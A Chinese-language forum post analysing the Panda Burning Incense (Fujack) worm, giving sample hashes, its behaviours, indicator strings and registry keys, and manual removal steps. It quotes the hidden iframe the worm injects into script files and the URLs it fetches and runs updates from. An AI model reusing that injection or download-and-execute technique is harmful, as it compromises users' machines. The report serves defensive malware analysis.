跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

病毒分析报告-熊猫烧香

轩辕三官
轩辕三官
木马病毒分析

精选回复

发布于

目录

1.样本概况

1.1 样本信息

1.2 测试环境及工具

1.3 分析目标

2.具体行为分析

2.1 主要恶意行为与代码分析

2.1.1 恶意程序对用户造成的危害

3.解决方案

3.1 提取病毒的特征,利用杀毒软件查杀

3.2 工具查杀思路

参考文献

1.样本概况

1.1 样本信息

病毒名称:Worm.Win32.Fujack.i

所属家族:Fujack

MD5值:5591324836B58B8E11CB61521E1A9B84

SHA1值:D8D82132318C614531864EE4EA553414B4480987

CRC32:F67C829D

编写语言:Delphi

壳:FSG v2.0

病毒恶意行为:

1、病毒将自身复制到C:/Windows/driver目录下

2、病毒在每个目录创建Desktop_.ini文件,文件内容为当前日期

3、病毒在C盘根目录创建autorun.inf文件,其中指定setup.exe自启动,后者即为病毒样本

4、病毒对程序目录下的exe等格式的文件进行感染,,图标变为熊猫烧香,打开被感染文件时,自动运行恶意代码

5、修改注册表项、隐藏病毒文件、设置病毒自启动、关闭杀毒软件服务

6、建立网络连接,在特定网址处下载更新病毒样本并执行

7、删除系统GHOST文件

8、根据名称关闭杀毒软件窗口、终结杀毒软件进程与部分系统进程(比如任务管理器、注册表编辑器),通过模拟按键关闭冰刃等安全软件

1.2 测试环境及工具

环境:Windows7

工具:IDA PRO、15PBOD、火绒剑、PEID等

1.3 分析目标

目标:分析病毒行为及实现过程,提取特征码、寻求解决方案

2.具体行为分析

2.1 主要恶意行为与代码分析

wydsrnrwp1b2204.png

 

行为:病毒自我复制

关键代码:

55bdr2ir2ex2205.png

 

行为:在每个目录创建Desktop_.ini文件

关键代码:

io34hu3xw112207.png

 

行为:C盘根目录创建autorun.inf、setup.exe文件

关键代码:

0revwwmyptp2208.png

1m1yufeargh2210.png

 

行为:感染指定格式的文件

关键代码:

检测可执行文件格式

e4t0ggqtvzj2211.png

感染exe等文件

5y2hkl20h4e2213.png

检测脚本文件格式

ao0nvxry2h22214.png

感染脚本文件,向其中写入"<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>"\r\n 疑似用于访问特定网址

w5llzb1m34u2215.png

 

行为:修改注册表

关键代码:

设置病毒自启动与文件隐藏

oyzc1trtctv2216.png

关闭系统以及杀毒软件服务

y42cb45ze302218.png

 

行为:进行网络通讯

关键代码:

连接www.tom.com等知名网站,疑似测试网络环境

hlm3rgxblbv2219.png

连接www.ac86.cn/66/up.txt,下载文件并执行

kz3jh2oh0jc2220.png

4iji4jbwelp2222.png

连接http://update.whboy.net/worm.txt,下载文件并执行

fzwrpvfd1352223.png

v4oanrehmyl2225.png

 

行为:删除系统GHOST文件

关键代码

zararspmdgp2226.png

 

行为:根据名称关闭防护软件窗口

关键代码

m1h4f1liwvo2227.png

 

行为:根据名称终结防护软件进程

关键代码

yyyhzyf1evu2228.png

 

行为:通过模拟按键关闭冰刃等安全软件

关键代码

tmxc5pqeelt2230.png

2.1.1 恶意程序对用户造成的危害

特定后缀的文件内容被更改、文件图标被修改

rhpb54ydegt2231.png

被感染文件前7531h字节被病毒覆盖

4qwbeh3fvmb2232.png

被感染文件的原代码被保存在病毒代码之后

a4xts2fyzlw2234.png

被感染文件最后被添加了被感染标识,包含原文件大小

st41a1yyivs2235.png

无法使用注册表编辑器、任务管理器等工具

4jrosrvnnds2237.png

iulyomuurxs2239.png

磁盘目录被写入病毒副本(setup.exe)以及自动启动程序(autorun.inf)以及其他文件(Desktop_.ini)

1wc31h4i5ff2241.png

l0k551hab5u2242.png

pdf3jmdhyps2243.png

3.解决方案

3.1 提取病毒的特征,利用杀毒软件查杀

特征:

whboy

***武*汉*男*生*感*染*下*载*者***

www.ac86.cn/66/up.txt

http://update.whboy.net/worm.txt

3.2 工具查杀

根据其病毒行为该病毒查杀思路应该包括以下几个方面:

  1. 删除文件

关闭病毒进程

hmegfzhfkr32244.png

删除C:/Windows/driver目录下病毒样本spo0lsv.exe

删除C盘根目录的setup.exe以及自动启动程序autorun.inf

szkepq4wn4e2245.png

删除各个目录下Desktop_.ini

h4f5hcstorb2247.png

删除病毒从网络下载到c盘根目录的文件

2、修复注册表

删除病毒自启动和病毒隐藏注册表项(推荐用户手工修改)

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcshare

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

删除病毒创建的注册表项

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\spo0lsv_RASMANCS

HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\spo0lsv_RASAPI32

恢复病毒删除的杀毒软件自启动注册表项

w5jrdr12y2q2249.png

恢复病毒修改的网络设置相关启动项

j30zfnp20gv2251.png

3、根据受感染文件整体大小,病毒样本大小,被添加的后缀大小,计算受感染文件原代码在文件中的偏移,尝试修复文件

恢复被感染文件的代码

c3vuvwfnsrd2252.png

bkwqlwpcpbe2253.png

参考文献

[1] 15PB教研组. 恶意代码分析实例熊猫烧香.北京蓝森科技有限公司

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。